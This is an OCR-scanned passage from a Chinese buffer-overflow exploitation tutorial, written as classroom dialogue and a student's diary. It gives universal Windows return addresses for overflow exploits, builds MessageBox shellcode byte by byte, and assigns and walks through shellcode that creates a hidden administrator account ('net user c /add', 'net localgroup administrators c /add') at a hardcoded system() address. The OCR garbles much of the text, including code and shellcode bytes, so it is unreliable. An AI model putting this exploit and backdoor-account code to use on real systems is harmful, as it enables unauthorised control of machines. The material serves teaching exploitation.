试 ， 然 后 调 出 JMP ESP 代 码 对 应 的 机 器 码 。 


我 们 将 在 ShellCode 编 写 一 章 ， 详 细 讲 解 得 到 机 器 码 的 过 程 ; 在 堆 浴 出 一 章 有 查找 call 
[еѕі+0х4С] 指令 机 器 码 的 讲解 ， 过 程 类 似 ， 可 以 参看 。 


О: 只 能 用 ESP 来 定位 吗 ? 
A: 当然 不 是 啦 ! 最 好 把 当时 寄存 器 的 内 容 都 看 一 青 ， 比 如 履 盖 异 前 时 ， 我 们 用 EBX。 
О: 履 盖 异常 处理 点 时 ， 我 用 的 就 是 CALL EBX 指 今 地 址 ， 为 什么 会 失败 ? 


A: 在 Windows 2000 下 ， 可 以 用 CALL EBX 指 邻 地 址 履 盖 ; 但 在 XP 下 ，EBX 会 变 为 0， 需 要 
用 POP POP RET 的 指令 地 址 来 覆盖 。 这 也 有 个 中 文 版 NT/Win2000/Win2003 都 通用 的 地 址 
— 0x7FFA1571。 我 们 将 在 ShellCcode 变 形 一 章 的 MDTM 漏 洞 利用 讲解 时 详细 讲 到 。 


Q: 为 什么 会 存在 通用 地 址 呢 ? 


А: 上 面 说 的 两 个 通用 地 址 都 是 指 中 文 版 的 通用 地 址 。 是 因为 在 同一 个 语言 版 本 中 ， 存 在 看 
一 个 从 来 没有 改动 过 的 程序 一 svchost。 它 只 是 一 个 吉 ， 用 以 启动 其 他 程序 ， 所 以 我 们 很 笠 
运 ， 能 在 它 那 里 找到 通用 的 地 址 。 


О: 有 世界 通用 地 址 吗 ? 


A: 9, Яра ! 但 同 种 版 本 的 各 语言 版 本 ， 比 如 Windows 2000 SP3 的 中 文 版 和 英文 
版 ， 在 Msvcrt.dll 中 找到 的 地 址 可 以 通用 。 


另外 ， 同 一 种 语言 的 各 个 系统 版 本 (上 比如 中 文 版 Windows2000、Windows XP) ,在 
0x7FFA0000 中 找到 的 地 址 可 以 通用 ， 惑 像 0xX7FFA4512 和 0x7FFA1571。 


如 果 你 找到 了 世界 通用 地 址 ， 请 共享 一 下 ， 谢 谢 |! 

О: 只 能 是 用 JMP САШ RET 这 样 的 指 合 地 址 来 覆盖 吗 ? 

А: 大 多 数 情 况 下 是 这 样 。 

Q : Windows 可 以 确切 的 定位 了 ， 但 Linux 下 有 确切 的 定位 ShellCode 的 方法 吗 ? 


А : 在 Linux 下 ， 可 以 把 ShellCode 放 在 环境 变量 ， 然 后 就 能 确切 计算 出 ShellCode 在 内 存 中 的 
地 址 ， 也 非常 精确 。 


О: 在 分 析 你 给 的 那个 例子 程序 时 ， 发 现 ESP 一 来 融 减 很 大 的 值 ， 为 什么 分 配 这 人 么 大 的 缓冲 器 
ic gem ? 


A : 分 配 的 空间 是 系统 自己 用 的 。 但 output[8] 还 是 只 分 配 了 8 个 字 节 的 空间 。 


О: 奇怪 ， 在 “name”" 数 组 比较 短 的 时 候 ， 测 试 会 报错 ; 但 我 按照 格 陈 履 盖 并 加 上 ShellCode 
后 ， 结 果 不 但 没 弹 出 窗口 ， 连 错误 也 不 报 了 ， 这 是 怎么 回 事 啊 ? (这 个 问题 我 就 遇 到 了 
~~~55555) 

А: 是 用 的 覆盖 地 址 不 对 。 而 没有 报错 ， 是 因为 你 履 盖 的 字符 串 太 基 了 ， 把 异常 处 理 点 也 覆 
盖 了 ， 当 然 报错 对 话 框 也 弹 不 出 来 了 。 


使 用 系统 相关 的 地 址 ， 我 们 马上 会 在 第 二 章 ShellCode 的 编写 中 讲 到 。 


ва — == Windows FSheIlICode 5:77 


ERT, ERT ! "同学 们 一 边 兴 高 采 烈 的 讨论 着 一 边 步 入 教室 。 新 的 一 周 又 开始 了 。 
“ 唱 ， 大 家 经 过 这 两 次 课 的 学 习 ， 有 什么 感觉 啊 ? "老病 等 同学 们 坐 好 后 问 。 


“ 响 ， 这 几 次 课 我 们 对 渝 出 编写 的 基本 思路 有 了 清晰 的 了 解 ; 掌握 了 利用 缓冲 区 浴 出 的 两 种 方 
x ; 同时 还 对 大 量 的 实际 漏洞 进行 了 成 功 的 编写 。"?" 古 风 认 真 的 说 道 。 


“ 虽 ， 让 我 们 的 兴趣 和 近 术 都 得 到 了 很 大 的 提升 。? 玉 波 说 。 
同时， 我 们 也 认识 到 了 真正 的 黑客 精 伸 是 钴 研 和 共 字 1 ” 王 强 佩服 的 说 道 。 


1760 8, KARA TERARI! 只 要 有 了 兴趣 和 钻研 的 精 伸 ， 融 可 目 主 的 不 
断 深入 下 去 ; 同时 ， 有 了 共 圣 的 精 俐 ， 束 会 得 到 别人 的 尊敬 ， 并 且 一 同 讨 论 、 一 起 进步 。” 


“但 是 ， 老 病 。” 宇 强 说 道 : “虽然 我 们 的 浴 出 水 平 的 确 有 所 提高 。 但 在 实际 编程 中 ， 
ShellCode 的 编写 不 是 特别 明白 ， 对 复 杀 漏洞 〈 比 如 堆 浴 出 漏洞 ) 7810, +s 
poe 
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老 炳 笑 道 : 呵呵 ， 别 着 急 ， 在 后 面 的 章节 中 我 们 会 慢 慢 深入 下 去 的 。 大 家 有 这 个 不 断 学 习 的 
想法 就 很 好 ! 再 提醒 一 次 ， 学 习 更 重要 的 是 方法 ， 而 不 是 技术 本 身 。 如 果 你 掌握 的 只 是 技 
术 ， 技 术 会 很 快 过 时 ， 那 你 就 没有 机 会 了 ; 如 果 掌握 的 是 方法 ， 那 你 就 能 很 轻松 的 应 对 技术 
的 变迁 。” 

大 家 齐 声 答 道 :“ 吧 ， 我 们 一 定 会 注意 的 1” 


= 
йй :“ 那 好 ， 首 先 我 们 一 起 来 看 看 ShellCode 的 编写 吧 1” 


2.4 3% Windows x1 ;£TEShellCodeB z 5 

“刚才 ShellCode 的 功能 是 弹出 DoOS 窗 口 控制 人 台 ， 虽 然 可 以 让 我 们 做 很 多 事情 ; 但 黑 乎 乎 的 ， 
SAPR ! " 玉 波 开玩笑 说 。 

“是 啊 ， 爱 美 之 心 人 此 有 之 ， 我 也 这 人 么 认为 。 "老师 说 。 

“呵呵 ， 是 啊 1 "大 家 都 笑 了 。 

“好 。 那 我 们 来 写 一 个 ' 漂 亮点 ' 的 ShellCode 吧 ! 弹出 一 个 Windows 图 形 界面 的 对 话 框 ， 如 何 ? 


ЖШ!” 











2.4.1 C 程 序 解 释 


“要 弹出 一 个 Windows 对 话 杠 ，user32.dll 中 的 MessageBox 男 数 可 以 帮助 我 们 完成 这 个 功 
BE. "ER LIB. 


“简单 的 说 ， 程 序 只 要 一 句 话 ， 实 现 如 下 。” 


#include "windows.h" 
int main(int argc, char* argv[]) 


| 
LoadLibrary("user32.d1l1l"); 
MessageBox(0, "ww0830","ww", 1); 
return 0; 

j 


"B4. 'LoadLibrary("user32.dll"y'& JI 2 user32.dll y & E E , KREA AAE ! ” 


“ја, MessageBox(0, "ww0830","ww", 1) 是 弹出 Windows 对 话 框 。 我 们 执行 ， 可 以 看 到 对 
话 框 的 标题 是 ww'， 里 面 的 内 容 是 "ww0830'。 如 图 2 一 16， 好 看 多 了 吧 ?3” 


'. Hessagehos — icrosoft Tisual С++ 一 [ШеякагдеПох„срр] 
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"|| [All global members *[l(No members - Create New Class..] т] "™ = 














MessageBax dasses 


int main() 

i 
LaadLibrary["user32.d11"]; 
Ме=5адеВох( а, "шейн", "wa", 1); 


return B; 
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хі Configuration: HessageBox - Wind? Debug 
J Linking... 


HessageBnx.exe 一 В error(s), B warning(s) 
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古风 核对 了 一 下 说 道 : “Hk ! 那 说 明 MessageBox 函 数 带 的 第 二 个 参数 'ww0830' 是 对 话 框 内 
容 ， 第 三 个 参数 ww' 是 标题 内 容 ?” 





wy 
IN 


= 07] “一 = 
` Ши. TL X ям, 
[2 Bz £ of 


“ [天 = » 
8, ЖЕН! 


“ 那 还 有 第 一 个 和 最 后 一 个 参数 呢 ? 一 个 用 的 是 0， 另 一 个 用 的 是 1， 又 代表 什么 意思 呢 ? ”古风 
继续 问 道 。 


“呵呵 | 我 们 看 看 官方 (微软 ) 给 的 定义 吧 ! 第 一 个 参数 的 帮助 信息 如 下 :” 


hwnd 
[in] Handle to the owner window of the message box to be created. If this parameter is NU 


a] mes 下 





“意思 是 ， 第 一 个 参数 表明 对 话 框 所 属 的 窗口 句柄 。 如 果 第 一 个 参数 为 NULL (BIO) ， 那 么 对 
话 框 不 属于 任何 窗口 。 这 里 我 们 用 的 融 是 0， 漳 出 不 属于 任何 窗口 的 对 话 框 。” 


“而 最 后 一 个 参数 ， 是 表明 对 话 框 的 类 型 。0 代 表 MB _OK， 即 只 有 一 个 'OK' 按 钮 ; 1 代表 
MB OKCANCEL， 对 话 框 会 有 'OK: 和 'Cancel 两 个 按钮 。 这 里 我 们 用 的 融 是 1， 两 个 按钮 的 对 
话 框 比较 好 看 吧 1” 


“对 话 框 还 有 很 多 类 型 ， 比 如 MB_RETRYCANCEL、MB_YESNO、MB_YESNOCANCEL 
等 ， 大 家 可 以 下 去 自己 看 看 。” 


“这 里 我 们 接 看 分 析 汇 编 和 ShellCode 的 生成 。” 


2.4.2 生成 汇编 和 ShellCode 


“对 比 前 面 的 分 析 。 执 行 system(“command.exe”) 时 ， 先 把 参数 command.exe 字 符 串 的 地 址 
入 栈 ， 再 call system 的 地 址 就 行 了 。” 


“那么 ， 执 行 MessageBox(0, "ww0830","ww", 1) 就 是 把 四 个 参数 从 右 至 左 压 人 堆栈 ， 即 先 压 
1， 再 压 "ww' 字 符 串 的 地 址 ， 然 后 是 ww0830' 字 符 串 的 地 址 ， 最 后 压 0 ; 接着 CALL 
МеѕѕадеВох BAT HERLOK Т ” 


“17002 FAW! 只 要 PUSH 0. PUSH 1505655 f. ERRE, “оа 97225! 如果 
参数 都 是 数字 就 好 了 。” 


王强 想 想 后 ， 问 道 , “" 那 ww' 和 "ww0830' 这 两 个 参 效 串 莫非 像 构造 command.exe 字 符 串 那样 ， 
先 在 栈 里 面 构造 出 来 ， 然 后 把 它们 的 地 址 作为 参数 人 栈 ?” 


“ 太 对 了 1 ”老病 表扬 道 ,，“ 第 三 个 参数 ww' 是 对 话 框 标题 ， 我 们 在 'ebp 一 0Bh’ 和 'ebp-0 信 的 地 方 
都 放 w'， 而 "ebp-09' 放 字符 串 结 束 标 志 0x00。 那 么 ，'ebp 一 0Bh' 束 是 字符 串 的 地 址 了 。 示 意图 
如 图 2 一 17。 Ú 





我们 把 ebp 一 0Bh' 放 在 ESI 中 保存 起 来 ， 等 会 儿 作为 参数 入 栈 ， 代 码 如 下 : ， 


// Ts RA" ww" ->esi 

mov byte ptr[ebp-0Bh], 77h//w 
mov byte ptr[ebp-0Ah], 77h//w 
mov byte ptr[ebp-09h],0h//0x00 
lea esi, [ebp-0Bh ] 


“然后 第 二 个 参数 (对 话 框 的 内 容 ) “ww0830' 也 是 类 似 。 我 们 把 它 放 在 'ebp-07h' 开 始 的 地 方 ， 
并 保存 在 ESI 中 ， 代 码 如 下 :” 


// 内 
mov 
mov 
mov 
mov 
mov 
mov 
mov 
lea 


zug 


2 "№0830" ->еаі 

byte ptr[ebp-07h],77h//w 
byte ptr[ebp-06h],77h//w 
byte ptr[ebp-05h], 30h//0 
byte ptr[ebp-04h], 38h//8 
byte ptr[ebp-03h], 33h//3 
byte ptr[ebp-02h], 30h//0 
byte ptr[ebp-01h],0h//0x00 
еді, [ebp-07h] 


“参数 都 构造 好 了 。 最 后 我 们 合 起 来 执行 MessageBox(0, "ww0830","ww", 1) IB ! ” 


“第 四 个 参数 是 1， 我 们 就 直接 PUSH 1 ; 倒数 第 二 个 参数 是 标题 字符 串 的 地 址 ， 我 们 存在 ES| 


中 的 ， 


所 以 PUSH ESI ; 同样 ， 内 容 字 符 串 的 地 址 是 在 EDI 中 ， 我 们 PUSH EDI ; 第 一 个 参数 


是 0， 我 们 PUSH 0。” 


“参数 都 入 栈 后 ， 我 们 CALL messagebox gitik, 1289178 Е, KAA E 
0x77d3add7， 我 们 直接 CALL Ox77d3add7 就 完成 执行 画 数 了 。 这 段 汇 编 代 码 如 下 : ” 


push 1 //1 
push esi / / 标题 
push edi // PS 
push 0 //0 
mov eax,77d3add7h //messageboxa( ) 
call eax 


“ 合 起 来 ， 在 VC 中 用  asmQ BRA, RAHAT, ХЕЛЕ, AA 1 如 图 2 一 18。” 


Q 有 版 缓冲 区 浴 出 教程 


` NezscagmekSHE 一 MWicrozgoft Wizgual Са 一 [MHeszage A SE. cpp] 
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 [(Globals] + ПАН global member: = || main 19 - EEE 


sjxp |  Sincludecwindows.h? 









H- qs MessageAsM classes 





int main() 
1 

LoadLibraryi("user22 .d11"]; 

аы 

{ 
pusn enp 
mou ebp,esp 
sub esp, sun 
Рт и" esi 
mou byte ptr[ebp-BHh] ,77h//w 
mou byte ptr[ebp-Büh] ,77h//w 
mov byte pntr[ebp-B9h] , 8h; ахай 
lea esi,[ebp-BBh] 
РТ waa ir yedi 
neu byte ptr[ebp-B/h].77h//v 
mou byte ptr[ebp-86h],77h//w 
mou byte ptr[ebp-85h],38h//8 
mou byte ptr[ebp-805h] ,38h//8 
meu hyre nte[ehp-n3hn] ,33h//3 
mou byte ptr[ebp-B?h] ,38h// A 
тои byte pbr[ebp-01h] , üh Oxon 
lea edi,[ebp-HWzh] 





push 1 ГРА! 

push esi гт 

push edi ii Н 

push 0 # ü 

müu eax,77d3add7h — //nessagebaxa() 
Ball Рах 


return M; 
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“Hk 1 又 成 功 了 ! "Ха 1 


“ 接 下 来 大 家 提取 ShellCode 吧 ! 也 顺便 再 复习 一 下 。” 


“好 的 ， 在 VC 中 按 F10 调 试 ， 然 后 调 出 汇编 和 对 应 的 机 器 码 ， 如 图 2 一 19。 我 们 把 对 应 的 机 器 
码 抄 下 来 就 可 以 了 。” 古 风 边 说 边 抄 。 


2.4.2 生成 汇编 和 ShellCode 71 


ES Ш=л=лртЕАЕШ Nicroezoft Yirzual C ii [break] [Disasseabiy] 
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[Global] = ii ll global me mber: ki il b m: am >]: XT = 54 É ' 日 || Jm 
00001017 FH 84 Яй Ba an : . chkesp {BALAT ACA) 

6: _аѕм 

7: 4 

8: push ebp 

c» 00501 DIC 55 push еһр 

g- myu Php, eap Debug 
00401 030 8H EC meu грр ,ехр 

18: sub esp, адһ 

BBA BTJ 81 EL HH HB ПШ HH sub esp,BBün 

11: РТ wt» eci 

l2: пш byle plrpebp- OI] li 

0501 055 C6 45 F5 77 mou byte ptr [ebp-88h], 77h 

13: mou byte ptr[ebp-üühn], 7 7h/7w 

Пач 01 059 GE 85 Tü Z? mou byte ptr [ebp MAN], 77h 

15: mou byte ptr[ebp- 89h] , аһ ax B8 

BBN GT HWD Со ^45 РУ Bd moy byte ptr [e&ebp-9],H 

15: lca csi,[cbp-tEh] 

00401 051 8D FS FS lea esi,[e&bp-B8Bh] 

16: zh S wBBE3H"-»edi 

iF: mou byte pte[ebp-07h],77h//u 

005401054 Có 45 F9 77 moy byte ptr [ebp-7],7?7h 

18: mou byte ptr|ebp-Hón],//h//w 

ЙЙАЙ1 сЕ ГА WG Ей 77 типи hyte ptr [ehp-ñ],77h 

19: mou byte pEtr[ebp-ü5n],39/78 

Daya 056 c6 45 FB 20 moy byte ptr [ebp-5],38h 

28: mou byte ptr[ebp- 85h] ,38h//8 

Ld 


00301060 Có h5 FU 38 mou byte ptr [ebp-4],38h 
E | > 
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Char ShellCode[] - 
"^NXBBNX8BNXECNX81NXECNX80NX090NXO0NXO0NXCGNXABNXF5BNX77NXC6NXA5" 
"NXF6NX77NXC6NXABNXF7NX0OONX8DNX75NXFBNXCOGNXABNXF9NX77NXC6NXA5" 
"NXFANX77NXC6NXABNXFBNX30NXC6NXABNXFCNX38NXC6NXA5BNXFDNX33NXC6" 
"^NXABNXFENX30NXC6NXABNXFFNXO9NX8DNX7DNXF9NX6ANX0O1NX56NX57NX6A" 


"NX00NXB8" 
"NXD7NXADNXD3NX7 7" / /MessageBoxES2X Bib ШЕ 
"NXFFNXxDO" 


“再 拿 浴 出 程序 测试 就 可 以 了 。 "古风 抹 抹 了 汗 说 。 


о, Sh 上 和布 蛙 大 家 都 能 理解 好 原理 ， 和 车 握 好 方法 。 今 天 早点 放学 ， 我 给 大 家 《再 布置 一 个 作 
业 ， 回 去 独立 完成 一 个 ShellCode， 功 能 是 在 系统 上 添加 一 个 用 户 ， 并 把 它 加 成 党 理 员 吴 份 ， 
下 节 课 我 会 让 一 位 同学 上 台 来 给 大 家 《讲解 他 的 完成 过 程 。 大 家 都 要 认真 准备 啊 ! ЛЖ EG 
不 出 话 来 ， 修 大 家 笑话 束 不 好 意思 了 吧 ! 班 上 还 有 女生 呢 1 OK,， 今天 到 此 为 止 ， 放 学!” 


2.5 添加 用 户 ShellCode 的 编写 


以 下 摘自 宇 强 的 日 记 。 





2.5.1 小 强 的 日 记 之 二 


9 月 23 日 Н 


添加 用 户 ShellCode 的 编写 


这 几 次 课 都 在 学 习 缓 冲 区 浴 出 利用 的 编程 ， 现 在 已 经 进入 ShellCode 的 编写 阶段 了 。 经 过 这 几 
次 的 学 习 ， 自 己 对 ShellCode 的 编 守 有 了 初步 了 解 ， 知 道 ShellCode 是 如 何 来 的 ， 感 觉 在 老病 
的 指导 下 又 有 了 很 大 进步 。 但 要 搞 懂 整个 技术 还 有 很 长 的 路 要 走 ， 自 己 一 步 步 来 吧 | 


老病 还 布置 了 作业 ， 留 给 我 的 一 个 是 找 Win2000 SP2 下 LoadLibrary 和 system 函 数 的 地 址 ; x= 
一 个 是 写 一 个 在 系统 中 添加 一 个 管理 员 用 户 的 ShellCode， 并 让 人 上 台 讲 。 在 回 冢 的 路 上 ， 我 
融 想 ， 目 己 一 定 要 认真 准备 准备 ， 不 然 抽 到 了 我 ， 上 去 什么 都 说 不 出 来 ， 其 不 惨 了 ? 


回 到 家 后 ， 勿 匆 吃 完 饭 ， 融 坐 到 电脑 前 考虑 这 两 个 问题 。 


对 第 一 个 找 函 数 地 址 的 问题 ， 比 较 简单 。 我 把 老病 给 的 程序 拷 到 Win2000 SP2 系 统 上 ， 并 加 
上 找 LoadLibrary 的 语句 ， 得 到 GetLoadSysAdd.cpp， 就 像 图 2 一 20， 然 后 编译 、 执行。 


GetLoadSysádd 一 Nicrosoft Visual C++ 一 [GetLoadSsysAdd. cpp *] 


[75 File Edit View Insert Project Build Tools LDriverStudio Window Help 


= Ый š ње 5-с тыа ЧА (н >| h 


„|х| | #include “windows -hy 

Hinclude <stdio.h> 

typedef void (*HVPRÜC)(LPTSTR) ; 

int mainí) 

{ 
HIHSTñHCE LibHandle; 
HYPROG Pracñadd: 
LibHandle = LoadLibraru("msucrt''); 
printFf("msucrt LibHandle = //x$xXn", LibHandle); 
Procñdd=(MYPR0C)GetProcñddress(LibHandle,"sustem''); 
printf("system = //х%х\п", Pracñndd); 


LibHandle = LoadLibraru("kerne1l32''); 

printf("kernel32 LibHandle = //x%w%n'", LibHandle); 
Prochdd-(HYPROüCO)GetProchddress(LibHandle," LoadLibrary"); 
printf("LoadLibrary = //x€txXn", Procfdd); 

return 8; 





Ln 19, Col 1 


iX 38548 is] ЯЙ, ѕуѕіет АЈ 21 Т, Æ0x77E6A254, {НІ оааіргагуњіШ 50, === 
没有 找到 。 当 时 很 和 奇怪， 自己 也 一 下 子 紧 张 了 起 来 ， 马 上 上 网 找 了 很 久 才 发 现 ， 在 系统 中 是 
没有 LoadLibrary 这 个 函数 的 ， 只 有 LoadLibraryA 和 LoadLibraryW 这 两 个 图 数 ， 在 ASCII 参 数 
时 系统 会 用 LoadLibraryA， 在 Unicode 参 数 时 会 用 LoadLibraryYW。 至 于 什么 是 ASCIll， 什 么 是 
Unicode， 自 己 还 不 清楚 ， 只 有 明天 问 老 病 了 。 


于 是 我 马上 把 程序 改 成 LoadLibraryA 并 执行 ， 这 下 正确 了 ， 如 图 2 一 21。 


.GetLoadsysAdd = Bicrosoft Yisual = = [GetLaadSyshdd.cpp з] 


Ë" File Edit View Insert Project Build Tools Driver5tudio Window Help 


= ug : кыымын 








—— aj xl Кы <windows „һ> 

Hinclude <stdio.h> 

typedef void (*=MYPRDC)(LPTSTR); 

int maln() 

{ 
HINSTANCE LibHandle; 
MYPROG Prochñadd: 
LibHandle = LoadLibrary{"msucrt"); 
printF("msucrt LibHandle = //x$xXn", LibHandle); 
Procñdd=(HYPR0C)GetProcñhddress(LibHandle,"sustem''); 
printf('"system = //x$xXn'", Procñda); 


LibHandle = LoadLibraru("kerne132''); 
printf("kernel32 LibHandle = //x$xXn", LibHandle); 


Prochdd" CHYPROC)GetProcüddress(LibHandle, оза иаа; 
printf("LoadLibrary = //x$£xXn", Procfdd); 


onm 改动 这 个 地 方 


Г 


| Ln15, Col63 REC |COL [OVR [READ Z 





—— icum ———Á LoadLibrary KASE 5 
第 一 个 问题 总 算 解 决 了 ， 长 松 了 一 口气 ， 心 里 稍微 平缓 


ЦУ 

















JE 


然后 我 继续 考虑 第 二 个 问题 ， 编 写 添 加 用 户 的 ShellCcode。 在 Windows 中 添加 用 Р, 
me 户 帐 号 "中 添加 ， 要 么 在 DOS 命 令 行 下 执行 net user name /add ; 要 把 一 
户 添加 到 管理 员 ， 则 要 在 DOS 命 兮 行 下 执行 net localgroup administrators name /add 。 


看 来 这 里 只 有 使 用 命 命 行 下 的 指 命 添加 用 户 了 。 我 仿照 老病 的 步骤 ， 先 写 出 C 的 程序 ， 然 后 改 
成 汇编 ， 最 后 提取 出 ShellCode。 


和 开 DOS 窗 口 的 程序 类 似 ， 添 加 一 个 名 为 “c" 的 管理 员 ， 其 C 程 序 代 码 如 下 : 


#include «windows.h» 
int main() 


LoadLibrary("msvcrt.dll"); 

system("net user c /add"); 

system("net localgroup administrators c /add"); 
return 0; 


即 执行 用 户 添 加 命令 ， FERE FB 户 执 行 升 为 管理 员 。 我 测试 了 一 下 ， 将 程序 命名 
为 “AddUserC.c”， 编 译 执行 ， 成 功 了 1 添加 了 一 个 名 为 “c” 的 管理 员 用 户 ， 如 图 2 一 22。 


`. ddUserC = icrosoft Visual C++ - [AddUserC.c] 


[Е] File Edit View Insert Project Build Tools DriverStudio Window Help 


ë = WF © у “2+ m P ga U 
| tán global member: > || Ф main 
a] x] include €windows.h? 


int mainí) 
i 
LoadLibrargy("msucrt .d11"); 
system("net user c /add"); 
system("net localgroup administrators c /add"); 


return 8; C: WINDOWSASysteni2Vcnd. ехе. n n 





= Пе user 


су SF: Study 4: У УНЧА booki Z.. - - |a x| | 


| — NSSCU-I394UIK616C 的 用 户 帐 户 
БЕТА TE Pk. 
Па Bv ЛЛ] SE Rv. Administrator Guest Не1рӣ== 
SUPPORT. 388945ай UUSR_SCU-I394U[HR516G NT 


Press any key to continue | E “> ptr ibd 


MERE E use 


«SCU-I394UIK6i16C 的 用 户 帐 户 





Administrator г: Guest 


Не 1рӣ==1= апі SUPPORT _388945aB UJUSR SC 
-laddüserC.exe - 8 errür(s), B warning(s) 


Build / Debug X Find in Files 1 X[ «| | 











然后 最 困难 的 地 方 到 了 : 把 上 面 的 程序 改 成 汇编 。 
第 一 名 “LoadLibrary(msvcrt.dlP?" 可 以 把 老病 给 的 程序 抄 过 来 。 
第 二 、 三 句 融 要 把 老 羡 给 的 代码 稍微 改 一 下 ， 将 参数 改 成 这 里 的 参数 才 行 。 


对 “System("net user c /add")” 这 句 话 ， 就 按 Windows 系 统 执 行 男 数 的 原理 ， 先 参数 入 栈 ， 再 
CALL system 函 数 的 地 址 。 这 里 的 参数 是 “net user c /add” 字 符 串 的 地 址 ， 所 以 先 在 栈 中 构造 
出 “net user с /add”， 即 这 样 


mov esp,ebp ; 把 ebp 的 内 容 赋 值 给 esp 

push ebp ; 保存 ebp，esp 则 减 4 

mov ebp,esp ; 给 ebp 赋 新 值 ， 将 作为 局 部 变量 的 基 指 针 

xor edi,edi ; 

push edi ; 压 人 0，esp 一 4， 作 用 是 构造 字符 串 的 结尾 \0 字 符 

push edi 

push edi 

push edi ; 加 上 上 面 ， 一 共有 16 个 字 节 ， 用 来 放 “net user c /add" 
mov byte ptr [ebp-OFh],6eh ;n 

mov byte ptr [ebp-0eh],65h ;e 

mov byte ptr [ebp-Odh],74h ; 
mov byte ptr [ebp-Och],20h ; 
mov byte ptr [ebp-0Obh],75h ; 
mov byte ptr [ebp-0ah], 73h ; 
mov byte ptr [ebp-09h],65h ; 
mov byte ptr [ebp-08h], 72h ; 
mov byte ptr [ebp-07h],20h ; 


ect 


mov byte ptr [ebp-06h],63h ; 
mov byte ptr [ebp-05h],20h ; 
mov byte ptr [ebp-04h],2Fh ; 
mov byte ptr [ebp-03h], 61h ;a 
mov byte ptr [ebp-02h],64h ;d 
mov byte ptr [ebp-O1h],Oh ‚© 


££ 7 


字符 串 构 造 好 后 





E NIER : 








lea eax, [ebp-0fh] ; 
push eax ; 字符 串 地 址 作为 参数 入 栈 


最 后 CALL ѕуѕіет АЈ (В00х78019В4А) 


mov eax, 0x78019B4A ; win2000 sp2 ѕуѕгетр Е 
call eax ; 调用 System 


上 面 的 代码 弄 了 半天 才 弄 好 。 测 试 了 一 下 ， 先 把 另外 两 句 保 留 ， 只 把 “system("net user c 
/add"?" 改 为 上 面 的 汇编 ， 得 到 “AddUserASM.cpp"”， 运 行 结果 如 图 2 一 23， 成 功 了 | 





p^ PE — Nicromoft Tisual Ci = ткт Үт — 





[г] Fila Ezit Мәә Inzark Prsjaet Euild Tolz Drisarziul:io Vinder Halp -Ejs 
5 zug Ba А e mm e S o l gg UL 
| [Globals] ~| {All global members 一 | | | $& main | — 

E E- Wrnowsvyst enit ad. exe | 








a] x] include windows h> 一 一 一 HEROS 
luinclude winbase.h? pang dyn TE A 5 sim asha ks Windows Г зће11соде HS ^5 
uid main(] H : 


LoadLibraryg("msucrt .d11"); 
.. asm 4 


nov esp,ebp ; Ere es AIRA esp d CERUS TNI 

push ebp ; esp— INE 

Ros ebrei ; Сода, ЖЕЕ 

A uk B, esp- t, E RIED Та 2004248214 РАР 11:84 
push edi —— о р 2884/11/26 F F й9:51 
push edi id a Ez 2984/1814 FF 11:84 
push rui ;如 上 上 面 ， 一 共有 1071-27 apaq E Yos 

nou byte ptr [ebp-BñFh],ñeh ;n H. VA, еа. 5 = 


nou byte ptr [ebp-Beh],65h ze 
nou byte ptr [ebp-Bdh].7^h t 
nou byte ptr [ebp-Bch],2Bh ; 

nou byte ptr [ebp-übh],75h zu 
nou byte ptr [ebp-üah],73h ;s 
mou byte ptr [ерр- 09] ,05һ ;e 
nou byte ptr [ebp-ü8h],7?h ¿r 


mov byte ptr |ebp-HW/h],z2Hh ; ША: рысы МШЕ... ALI 

nou byte ptr [ehp-86h],63h ¿c Г Ta 

тй!) bute ptr [ebp- 85h] ,2Bh = pu E 1, "duüministratars 
mov byte ptr [ebp-85h],2Fh :/ EE LM "Hone 


nou byte ptr [ebp-ü3h],61h :a 
nous byte ptr [cbp-B2h],&hh sd 
nou byte ptr [ebp-01h], Oh ;ü 


lea гах er BF 


push рах БЕШ TES :性 


2 ñdduUserñSM.esa - ü error(s), B warning(s) 
Ffr Dir lu j Debug Pind in Files 1 , 4 | | 














当 看 到 "命令 成 功 完 成 "的 提示 时 ， „иу ia 从 椅子 上 跳 了 起 来 ， 把 手 
握 成 姜 关 从 空中 划 过 ， 大 号 了 一 声 "Yeah” ! 当时 的 心情 只 有 经 历 过 干 平 万 苦 最 后 成 功 的 人 才能 
体会 到 。 那 个 时 刻 ， 我 深 深 感受 到 了 研究 线 冲 区 编程 的 魅力 。 


父母 推 开 门 ， 问 我 发 生 了 什么 事 ， 我 笑 了 笑 ， 告 诉 它们 没什么 ， 只 是 解决 了 一 个 技术 问题 。 

他 们 嘱 只 我 不 要 太 霖 、 注 意 早点 休息 后 又 出 去 了 。 心 情 积 平静 后 ， 我 再 次 坐 了 下 来 ， 把 剩 下 
B9"LoadLibrary(*msvcrt.dll")"&*system("net localgroup administrators c /add")" 也 仿照 着 改 为 
汇编 ， 得 到 了 “AddUserAlIASM.cpp”， 再 次 编译 执行 ， 还 是 成 功 了 |! 


能 因为 刚才 太 过 兴奋 ， 这 次 我 的 心情 没 那 么 激动 了 。 最 后 剩 下 的 只 有 体力 活 了 ， 我 按 老 病 
HORETA Ais 把 汇编 对 应 的 机 器 码 抄 下 来 ， 得 到 了 自己 写 的 第 
个 ShellCode。 太 有 成 就 感 了 


提取 出 ShellCode 后 ， 把 它 存 在 “AddUserCode.cpp" 里 ， 但 发 现 还 不 知道 如 何 验 证 是 否 正确 ， 
明天 去 问 问 老病 吧 ! 


ShellCode 比 较 长 ， 我 抄 了 很 久 ， 抄 完 后 觉得 好 累 啊 ! 一 看 表 ， 不 知 不 觉 夜 都 深 了 ， 今 天 束 到 
这 里 吧 ， 休 息 了 ко 续 认 真 听 课 。 那 个 小 倩 ， 今 天 看 了 我 两 眼 ， 不 知 是 否 对 我 也 有 感觉 
呢 ?不 想 了 ，. 继 续 努 力 吧 ! 把 握 好 大 学 这 四 年 的 时 光 ， 无 悔 这 青春 岁月 。 


到 这 Em 我 想起 了 一 首 诗 。 
RAX 


昨夜 小 风 残 月 ， 望 断 天 狠 斜 射 。 
Бе 55—35, Eb EAE. 
ERAI, ACA ES 

若是 它 年 不 出 头 ， 甘 愿 忍受 一 生灵 。 
BILERAN, RRE, RHR. 


海 到 无 边 天 做 翌 ， 山 登 至 极 我 为 峰 。 


好 个 海 到 无 边 天 做 岸 ， 山 登 至 极 我 为 峰 ! 以 此 名 为 座右铭 ， 提 醒目 己 ， 


Ж 1 


а 957), A BRA 





2.5.2 小 强 的 日 记 之 三 


9 月 27 日 晴 


添加 用 户 的 另 一 种 方法 


今天 是 个 艳阳 天 ， 丈 如 同 我 的 心情 一 样 ， 晴 空 万 里 。 


